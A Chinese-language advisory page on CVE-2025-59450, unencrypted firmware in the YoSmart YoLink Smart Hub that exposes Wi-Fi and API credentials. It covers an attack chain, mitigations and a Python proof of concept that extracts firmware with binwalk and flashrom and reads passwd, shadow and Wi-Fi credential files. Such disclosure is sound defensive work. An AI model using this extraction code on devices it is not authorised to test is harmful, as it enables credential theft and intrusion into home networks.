CVE-2025-59450：YoSmart YoLink智能Hub固件未加密导致凭据泄露

漏洞信息

漏洞编号

CVE-2025-59450

漏洞类型

信息泄露/固件未加密

CVSS评分

4.3 中危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

YoSmart YoLink Smart Hub

漏洞概述

CVE-2025-59450是YoSmart公司生产的YoLink智能Hub固件中存在的一个安全漏洞。该漏洞影响固件版本0382，其核心问题在于固件映像未进行加密保护。攻击者可以通过物理访问设备或从设备中提取固件数据的方式，直接读取固件内容。由于固件中存储了网络访问凭据（如Wi-Fi密码、API密钥等敏感信息），未加密的固件使得这些凭据可以被轻易提取和解析。该漏洞的CVSS评分为4.3，属于中危级别。虽然需要本地访问权限（AV:L），但无需任何认证（PR:N）和用户交互（UI:N），即可获取设备的网络访问凭据。攻击者利用提取的凭据可以进一步接入受害者的本地网络，进而访问其他联网设备，构成IoT安全链中的薄弱环节。该漏洞由Bishop Fox安全研究团队在博客中披露，并指出一个价值20美元的智能设备就能成为攻击者入侵用户家庭网络的入口。该漏洞的存在反映了IoT设备在固件安全方面的常见问题：制造商在追求成本和便利性的同时，往往忽视了固件保护机制的重要性。

技术细节

YoSmart YoLink Smart Hub固件版本0382未对固件映像实施加密保护。正常情况下，IoT设备的固件应使用加密签名或加密存储，以防止未经授权的固件提取和逆向工程。然而，YoLink Hub的固件以明文形式存储在设备的闪存芯片中。攻击者可以通过以下方式利用此漏洞：

1. 物理拆解设备，访问闪存芯片（如SPI Flash），使用编程器（如CH341A）直接读取固件数据；
2. 通过UART、JTAG等调试接口提取固件；
3. 从设备提供的固件更新包中直接获取未加密的固件文件。

获取固件后，攻击者可以使用binwalk等固件分析工具解压文件系统镜像，在/etc/config/、/etc/passwd、/etc/shadow等配置文件中查找存储的Wi-Fi凭据、API令牌、设备密钥等敏感信息。提取的网络凭据可直接用于接入用户的本地无线网络，绕过正常的网络认证机制。此外，固件中的其他配置信息（如MQTT服务器地址、加密密钥等）也可被用于进一步的攻击活动，如中间人攻击、设备伪造等。

攻击链分析

STEP 1

步骤1：获取设备物理访问权限

攻击者需要物理接触目标YoSmart YoLink Smart Hub设备，获取对设备的物理访问权限。

STEP 2

步骤2：提取未加密固件

通过拆解设备，使用SPI编程器（如CH341A）直接读取闪存芯片中的固件数据，或通过UART/JTAG调试接口获取固件。由于固件未加密，可直接获得明文数据。

STEP 3

步骤3：分析固件内容

使用binwalk等工具解压固件文件系统，在配置文件中搜索存储的Wi-Fi密码、API密钥等网络访问凭据。

STEP 4

步骤4：获取网络凭据

从固件中提取Wi-Fi SSID和密码，以及其他网络认证信息。

STEP 5

步骤5：接入本地网络

使用提取的Wi-Fi凭据接入受害者的本地无线网络，获得网络内访问权限。

STEP 6

步骤6：横向移动

接入网络后，攻击者可进一步扫描网络中的其他设备，执行横向移动攻击，访问其他IoT设备或敏感资源。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-59450 PoC - YoSmart YoLink Smart Hub Firmware Extraction
# This PoC demonstrates how to extract network credentials from unencrypted firmware

import subprocess
import os
import sys

def extract_firmware(firmware_path):
    """
    Extract contents from unencrypted YoSmart YoLink Smart Hub firmware
    """
    print(f"[*] Analyzing firmware: {firmware_path}")
    
    # Step 1: Use binwalk to scan and extract firmware contents
    print("[*] Running binwalk to identify file systems...")
    result = subprocess.run(
        ["binwalk", "-e", firmware_path],
        capture_output=True, text=True
    )
    print(result.stdout)
    
    # Step 2: Search for sensitive configuration files
    extracted_dir = firmware_path + ".extracted"
    sensitive_patterns = [
        "passwd", "shadow", "wpa_supplicant",
        "wireless", "wifi", "network", "config",
        "api_key", "token", "credential"
    ]
    
    print("[*] Searching for sensitive files...")
    credentials = {}
    for root, dirs, files in os.walk(extracted_dir):
        for file in files:
            for pattern in sensitive_patterns:
                if pattern in file.lower():
                    filepath = os.path.join(root, file)
                    print(f"[+] Found sensitive file: {filepath}")
                    with open(filepath, 'r', errors='ignore') as f:
                        content = f.read()
                        credentials[file] = content
    
    return credentials

def parse_wifi_credentials(config_content):
    """
    Parse Wi-Fi credentials from configuration content
    """
    credentials = {
        "ssid": [],
        "password": [],
        "api_keys": []
    }
    
    for line in config_content.split('\n'):
        line = line.strip()
        if 'ssid' in line.lower() and '=' in line:
            credentials["ssid"].append(line.split('=', 1)[1].strip('"'))
        if 'psk' in line.lower() or 'password' in line.lower() or 'key' in line.lower():
            if '=' in line:
                credentials["password"].append(line.split('=', 1)[1].strip('"'))
    
    return credentials

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[0]} <firmware_binary>")
        sys.exit(1)
    
    firmware = sys.argv[1]
    if not os.path.exists(firmware):
        print(f"[!] Firmware file not found: {firmware}")
        sys.exit(1)
    
    creds = extract_firmware(firmware)
    print("\n[*] Extracted Credentials:")
    for fname, content in creds.items():
        print(f"\n--- {fname} ---")
        print(content)
    
    # Alternative: Physical extraction via SPI programmer
    print("\n[*] For physical extraction, use:")
    print("    sudo flashrom -p ch341a_spi -r firmware_dump.bin")
    print("    binwalk -e firmware_dump.bin")

影响范围

YoSmart YoLink Smart Hub 固件版本 0382

防御指南

临时缓解措施

在等待官方修复期间，建议采取以下临时缓解措施：1）将YoSmart YoLink Smart Hub放置在受控的物理环境中，限制未授权人员的物理访问；2）将IoT设备隔离在独立的网络VLAN中，限制凭据泄露后的影响范围；3）定期更换Wi-Fi密码，降低已泄露凭据的有效性；4）监控网络中的异常连接和流量，及时发现潜在的入侵行为；5）避免在IoT设备所在的网络上存储或传输敏感数据。